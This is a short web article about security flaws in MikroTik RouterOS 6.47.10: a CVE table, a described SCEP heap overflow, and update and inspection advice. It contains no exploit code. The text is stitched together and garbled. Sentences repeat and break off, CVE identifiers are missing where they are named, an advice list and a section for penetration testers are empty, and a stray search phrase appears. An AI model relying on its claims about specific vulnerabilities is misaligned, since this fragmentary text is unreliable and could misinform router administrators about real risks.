To protect against this exploit, users and administrators of MikroTik devices running RouterOS version 6.47.10 are strongly advised to:
A successful exploit can lead to Remote Code Execution (RCE) without requiring prior authentication.
Inspect /system scheduler print for malicious recurring scripts.
| CVE | Component | Impact | Fixed in version | |-----|-----------|--------|------------------| | CVE-2020-20217 | WinBox | Arbitrary file read (PoC public) | 6.47.8 | | CVE-2020-20214 | HTTP proxy | Memory corruption (DoS) | 6.47.4 | | CVE-2019-3977 | SMB service | Unauthenticated RCE | 6.44.4 | | CVE-2018-1157 | WinBox | Directory traversal (file read) | 6.43 | mikrotik 6.47.10 exploit
A feature that can disable the physical reset button and etherboot, which hackers have used in some cases to "lock" owners out of their own devices after a compromise.
While FOISted was about moving from admin to root, targeted 6.47.10 from the outside.
If you are still running MikroTik , you are at significant risk. Follow these steps to secure your device: To protect against this exploit, users and administrators
The most alarming vulnerability present in 6.47.10 is , a heap-based buffer overflow in the Simple Certificate Enrollment Protocol (SCEP) server. An attacker can trigger this overflow to execute arbitrary code on the router, gaining full control. The exploitation complexity is elevated, however, as the attacker must know the specific scep_server_name value configured on the target—effectively requiring prior reconnaissance or the service name being set to a predictable default. Despite this prerequisite, the exploit code exists in the wild, and the vulnerability is considered high risk with a CVSS v3 score of 8.1.
For researchers and penetration testers:
Navigate to System -> Packages and update to the latest available version in the "Stable" or "Long-term" channel (preferably 7.x). While FOISted was about moving from admin to
While RCE and privilege escalation typically dominate security discussions, denial of service (DoS) vulnerabilities in network infrastructure can be equally devastating, causing network outages that affect entire organizations.
The following CVEs also affect 6.47.x but are less frequently discussed, but represent part of the broader risk profile: